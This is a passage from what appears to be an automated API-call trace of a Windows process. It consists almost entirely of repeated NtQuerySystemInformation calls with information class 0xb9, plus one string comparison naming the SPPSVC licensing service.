Length=0x50, ResultLength=0x0) [0281.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0281.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0281.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0281.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0281.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0281.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8f0, Length=0x28, ResultLength=0x0) [0281.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0281.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0281.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0281.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0281.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd010, Length=0x20, ResultLength=0x0) [0281.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0281.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0281.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0281.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0281.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0281.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0281.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0281.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0281.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0281.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0281.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0281.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0281.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0281.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0281.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0281.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0281.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0281.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0281.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0281.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0281.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0281.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0281.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0281.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0281.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0281.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0281.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0281.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0281.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0281.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0281.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0281.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0281.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0281.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x50, ResultLength=0x0) [0281.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdc0, Length=0x28, ResultLength=0x0) [0281.157] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x50, ResultLength=0x0) [0281.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x50, ResultLength=0x0) [0281.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x50, ResultLength=0x0) [0281.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0281.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0281.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0281.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0281.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x28, ResultLength=0x0) [0281.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0281.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0281.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x20, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, 